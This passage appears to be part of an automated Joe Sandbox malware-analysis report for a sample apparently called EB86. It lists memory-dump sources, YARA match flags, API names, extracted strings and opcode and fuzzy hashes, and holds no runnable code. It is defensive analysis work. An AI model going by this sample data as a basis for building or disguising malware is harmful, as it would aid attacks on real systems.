                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 7&'$$vA\
                                                                                                                                                                                                                                                  • API String ID: 0-2621209329
                                                                                                                                                                                                                                                  • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                                                  • Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02177E61
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 237503144-0
                                                                                                                                                                                                                                                  • Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                                                                                                                                                                                                  • Instruction ID: 1a3f04de4081ba01aa4a2ef4d3d1b1b8a4bb42186e2087a2c802f8454c0f3342
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22B1F2729487218BC314CF28C8917AAF7F2FFD9314F19962CE4C55B294E7389902C796
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d
                                                                                                                                                                                                                                                  • API String ID: 0-2382032918
                                                                                                                                                                                                                                                  • Opcode ID: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
                                                                                                                                                                                                                                                  • Instruction ID: d2e23a67c1903cd1e9c185385271eb72bcb916f6a4fd91b19e1fe5de6aa7faac
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B122775B00226CBDB14CF68D8917AFB7B2FF8A300F5980A9C441AB3A5D7399D42DB54
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ''
                                                                                                                                                                                                                                                  • API String ID: 0-694448769
                                                                                                                                                                                                                                                  • Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                                                                                                                                                                                                  • Instruction ID: 5ee31369bac1c27927d18705f966606cfc38d2ce65e8134e3508c717dbd5d32f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 529110B16583008BC3248F28C89166BB7F2EFD5364F189A2DE8D68B790E774C645C796
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ''
                                                                                                                                                                                                                                                  • API String ID: 0-694448769
                                                                                                                                                                                                                                                  • Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                                                                                                                                                                                                  • Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: *+
                                                                                                                                                                                                                                                  • API String ID: 0-2181965719
                                                                                                                                                                                                                                                  • Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                                                                                                                                                                                                  • Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: UXY^
                                                                                                                                                                                                                                                  • API String ID: 0-1486013802
                                                                                                                                                                                                                                                  • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                                                  • Instruction ID: 5fdd1e2c428ffbec881db818d9169af42ad8bdb1f1feeec8a09932e53f8f6edb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 929126B5604B818FD315CF29C994A62FBA2FF96300B19869CC0D28FB56C739E416CF95
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: UXY^
                                                                                                                                                                                                                                                  • API String ID: 0-1486013802
                                                                                                                                                                                                                                                  • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                                                  • Instruction ID: d4a14a9f2c2f0854964ffc34a88a484fd9aac6a31bc7c6ca58301aeff22ad83a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B79135B5504B418FD315CF2AC990622FBA2FF96300B188AACC0D24FB56C738E816CF95
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d
                                                                                                                                                                                                                                                  • API String ID: 0-2382032918
                                                                                                                                                                                                                                                  • Opcode ID: 87ffeb648b9d3b2ccfc57117cdf1fc242bb3e2d04f71168daa08cd74ffe209e9
                                                                                                                                                                                                                                                  • Instruction ID: 4e43b3032b5f77b82ebf5265758dd730748cf5b28328c74b298a748a547da810
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87ffeb648b9d3b2ccfc57117cdf1fc242bb3e2d04f71168daa08cd74ffe209e9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2915635E04225DFDB15CFA8D8907AEB7B2FF4A300F9980A9D502AB351D739AD42CB44
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d
                                                                                                                                                                                                                                                  • API String ID: 0-2382032918
                                                                                                                                                                                                                                                  • Opcode ID: 8ede958760def0fb47ef62c8d664d44c55fbe6b810f6c68a305d53f1873dda57
                                                                                                                                                                                                                                                  • Instruction ID: 6b56226ad8b0c30fedef16d1ed8bae040211a9a072c8b9eb3e8edc34aa7c4811
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ede958760def0fb47ef62c8d664d44c55fbe6b810f6c68a305d53f1873dda57
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9781B2386452059FD724DF2CC8A0A2AB3F2EF89714F15856CED95CB3A4EB31E851CB45
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: "
                                                                                                                                                                                                                                                  • API String ID: 0-123907689
                                                                                                                                                                                                                                                  • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction ID: 6dec49bc15768d016656feb92f768c861d09340e24ffeca4549e01789b0ad71f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D71D032A483559BD724AE38E8C031EBBE2ABC6724F19C52DE4949B3D1D7759C44CF82
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: "
                                                                                                                                                                                                                                                  • API String ID: 0-123907689
                                                                                                                                                                                                                                                  • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction ID: 6564e7b3ad14b453794cbf2f19722db2d5742acb1a2f8ce2a072c031a44184fe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23710432F083254BD714CE28E88071FBBE2ABC5710FA9852EE4958B391D239DD45878A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: _;=8
                                                                                                                                                                                                                                                  • API String ID: 0-3640539833
                                                                                                                                                                                                                                                  • Opcode ID: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                                                                                                                                                                                                  • Instruction ID: 2447083201972a05585b1eeb2ae0b50f205839780ed8e8223be8bf5566fde7d7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B151EFB0511B508BC7389F25C861AB7BBF1FF82349B084E5DC5C38BA55E739A509CBA1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: _;=8
                                                                                                                                                                                                                                                  • API String ID: 0-3640539833
                                                                                                                                                                                                                                                  • Opcode ID: 1d81db7cde41a3e0fb3553ca3b72ed2fa4290f6dd7cddc566a2c3c75c2eae2db
                                                                                                                                                                                                                                                  • Instruction ID: e58a9c241393c577c0dbf69e703309a02622358f74323d7420d86702d8d0d07f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d81db7cde41a3e0fb3553ca3b72ed2fa4290f6dd7cddc566a2c3c75c2eae2db
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 245112B0521B008BC7249F25C8616B3BBF1EF52345B084E5DC4C38BB45E739A948CBA5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: *+
                                                                                                                                                                                                                                                  • API String ID: 0-2181965719
                                                                                                                                                                                                                                                  • Opcode ID: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
                                                                                                                                                                                                                                                  • Instruction ID: b163c60baaa6b9895fd69ef885e02ad581d2f91ddeec77fa494c100f1b4b4694
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 566120B144A3818BD7708F2584917DBFBF2AFD6318F14892CD5C89B254EB384146CB87
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d
                                                                                                                                                                                                                                                  • API String ID: 0-2382032918
                                                                                                                                                                                                                                                  • Opcode ID: 40df236e589d81010455b97f2d2192286a205d1063d17ff6a38768a85cdfa26a
                                                                                                                                                                                                                                                  • Instruction ID: 98676c0e183696f815878c2bdfca4d0d946282f268c46d2ae2bce33ce0b67fb0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40df236e589d81010455b97f2d2192286a205d1063d17ff6a38768a85cdfa26a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3416771A443106FEB149F68DD90B6BBBE5EF89B08F14842DE98593150E732E804CBD2
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: 8/d
                                                                                                                                                                                                                                                  • API String ID: 2994545307-2382032918
                                                                                                                                                                                                                                                  • Opcode ID: 729b3e7d6e3191008210f842740a6d9190df207d04178a60961e4fc3c3af6df3
                                                                                                                                                                                                                                                  • Instruction ID: a4b821128decaa172c514915c42a23315f051a59fcda10375df645c6c4b50b9f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 729b3e7d6e3191008210f842740a6d9190df207d04178a60961e4fc3c3af6df3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF417C759043146BE310EF24ECC1B6BB7A4EF89708F10942EF985A7251E735EC04879A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: }I\
                                                                                                                                                                                                                                                  • API String ID: 0-3759065986
                                                                                                                                                                                                                                                  • Opcode ID: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                                                                                                                                                                                                  • Instruction ID: 1a7a530eaad5819c52513f28df8f8631568e7bdb49800c033fd43be28493c3c1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17318E745646928BDB11CF34C8A17B6BBF0FF4B214B144759C8C18BA81EB38A582DB81
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: }I\
                                                                                                                                                                                                                                                  • API String ID: 0-3759065986
                                                                                                                                                                                                                                                  • Opcode ID: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                                                                                                                                                                                                  • Instruction ID: 06326f033c1d303d2a0c44ae50e6a95f42fac71f38a9198839615570ed5a6674
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 653126605546928BEB258F34C8A27B7BBB0FF47310F144759C8C18B785EB78A992CB85
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d
                                                                                                                                                                                                                                                  • API String ID: 0-2382032918
                                                                                                                                                                                                                                                  • Opcode ID: 2f3d0f86c51dd52561bd956f66a0919b21b2b2791d13a1f53376856cb036d1a9
                                                                                                                                                                                                                                                  • Instruction ID: 6900ed6ad2931ad5ec4a015ef86fd2bf22d6f9be5d5c85ff99303cca4e658c83
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f3d0f86c51dd52561bd956f66a0919b21b2b2791d13a1f53376856cb036d1a9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E311C6346C1220EED3689F189DDAB3D3271EB8A718F164638F151920E2D7717860DA0D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d
                                                                                                                                                                                                                                                  • API String ID: 0-2382032918
                                                                                                                                                                                                                                                  • Opcode ID: f5d7cfea0e4e327b9eda319c71044655f3c20aae259e9c189ca88ac76d4abae3
                                                                                                                                                                                                                                                  • Instruction ID: b8078731f940243b2da9ba231f32288be6c042e1c07f381b80ed3169b3ae1740
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5d7cfea0e4e327b9eda319c71044655f3c20aae259e9c189ca88ac76d4abae3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF0F975540218BBC6104B49DC81E3B77AEEBCE76CF144318F42892561E33AFE12C7A9
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: 8/d
                                                                                                                                                                                                                                                  • API String ID: 2994545307-2382032918
                                                                                                                                                                                                                                                  • Opcode ID: 59ed13ec8eb8bd8147eea6b0df157e6c9ae6c2307cf57b48e0fe75af3e9c5a7e
                                                                                                                                                                                                                                                  • Instruction ID: 0c7a45b7bc69abfe1ea4a300e8af6adda297262347155a361b302868447e3dd6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59ed13ec8eb8bd8147eea6b0df157e6c9ae6c2307cf57b48e0fe75af3e9c5a7e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFF0D635904214BBD5104F49EC81D37737DE7CE768F141329E514122A2A732AD1186A9
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d
                                                                                                                                                                                                                                                  • API String ID: 0-2382032918
                                                                                                                                                                                                                                                  • Opcode ID: 6146b7094830001aaaf13cb0f51437480e6ddd60403108575e1b98eecd2c1ab1
                                                                                                                                                                                                                                                  • Instruction ID: fae04029ff9aa530a16d96a2fb50fbc35a4622ae2b55880f83ed38246be0aee9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6146b7094830001aaaf13cb0f51437480e6ddd60403108575e1b98eecd2c1ab1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FF090F4E4C612DFD618AF18DCD263A73A6EF86358F184528E0A597174D331A911CE0A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d
                                                                                                                                                                                                                                                  • API String ID: 0-2382032918
                                                                                                                                                                                                                                                  • Opcode ID: d0bff55706ff93967b4313bb2a1d7a7ee9ee426091711acca18b712e24a09905
                                                                                                                                                                                                                                                  • Instruction ID: c14077b8a130247762470a12415ef9365636b0c970e2bf5ce29861a99db5fcbf
